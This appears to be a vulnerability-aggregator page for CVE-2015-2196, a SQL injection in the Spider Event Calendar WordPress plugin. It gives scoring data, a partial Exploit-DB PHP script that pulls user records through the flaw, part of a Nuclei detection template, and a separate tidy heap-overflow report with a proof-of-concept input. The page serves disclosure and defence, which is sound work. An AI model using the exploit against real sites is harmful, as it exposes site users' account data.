CVE-2015-2196
Published: 2015-03-03
Priority: P354 · Severity: high · CVSS 2.0 base score: 7.5
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit: available
EPSS: 11.18% (95.4th percentile)

SQL injection vulnerability in Spider Event Calendar 1.4.9 for WordPress allows remote attackers to execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| web-dorado | spider_calendar | — | — |
No detection rules found.
Exploit-DB
WordPress Plugin Webdorado Spider Event Calendar 1.4.9 - SQL Injection
exploitdb·2015-02-13
Excerpt of the Exploit-DB script (the listing is truncated at the start; the constants it references are defined in the part not shown):

```php
# Exploit Title: WordPress: Webdorado Spider Event Calendar ';
$fullURL = sprintf(FETCH_USERS_URL, $server, $server, FAKE_ID_TO_SEARCH, $tableName);
$usersCurl = curl_init($fullURL);
curl_setopt($usersCurl, CURLOPT_RETURNTRANSFER, true);
$result = curl_exec($usersCurl);
if (stripos($result, PATTERN_TO_SEARCH) !== false)
{
    $from = stripos($result, PATTERN_TO_SEARCH_USERS);
    $to = stripos($result, PATTERN_TO_SEARCH_USERS, $from + strlen(PATTERN_TO_SEARCH_USERS));
    $result = substr($result, $from, $to - $from);
    echo '' . str_replace(FIELD_SEPARATOR, '', str_replace(ROW_SEPARATOR, '', str_replace(PATTERN_TO_SEARCH_USERS, '', $result))) . '';
}
else
{
    echo 'Table name fetched, but not users - try to rewrite exploit :-(';
}
```
Nuclei
WordPress Spider Calendar <=1.4.9 - SQL Injection
nuclei·CVSS 7.5
WordPress Spider Calendar =6'

Template excerpt (truncated in this listing; only the tail of the matcher section survives):

```yaml
          - 'status_code == 200'
          - 'contains(body, "{\"status\":true,\"data\"")'
        condition: and
# digest: 4a0a004730450220096e1924a7f497978ec7f0f7eca24d9d64196deb75b63abb4bb54b2fd3b547930221008f57993def8a9b8dc030ecc3c342bad55b33a856ccd2f95efa70820d441fb2db:922c64590222798bb761d5b6d8e72950
```
Greynoiseio
NoiseLetter October 2025
Bugzilla
CVE-2015-5522 CVE-2015-5523 tidy: heap buffer overflow in ParseValue()
bugzilla·2015-06-04·CVSS 6.8
A heap buffer overflow was reported in Tidy.
This issue could be abused in server-side applications that run the php-tidy extension on user input.
Part of original report:
"""
POC
$ printf "\x3c\x61\x20\x62\x3d\x3c\x61\x20\x3c\x3f\x78\x6d
\x0d\x3f\x3e\x62\x3d\x22\x63\x22\x47\x20\x68\x72\x65
\x66\x3d\x22\x12\x22\xbb" > err.html
An asan-enabled build of tidy outputs:
$ tidy-asan err.html
==2196==ERROR: AddressSanitizer: heap-buffer-overflow on address
0xb53006b1 at pc 0xb71df8fe bp 0xbfac9928 sp 0xbfac9918
WRITE of size 1 at 0xb53006b1 thread T0
#0 0xb71df8fd in prvTidytmbstrndup (/usr/lib/libtidy-0.99.so.0+0x15c8fd)
#1 0xb7141060 in prvTidyGetToken (/usr/lib/libtidy-0.99.so.0+0xbe060)
#2 0xb711856e in prvTidyParseDocumen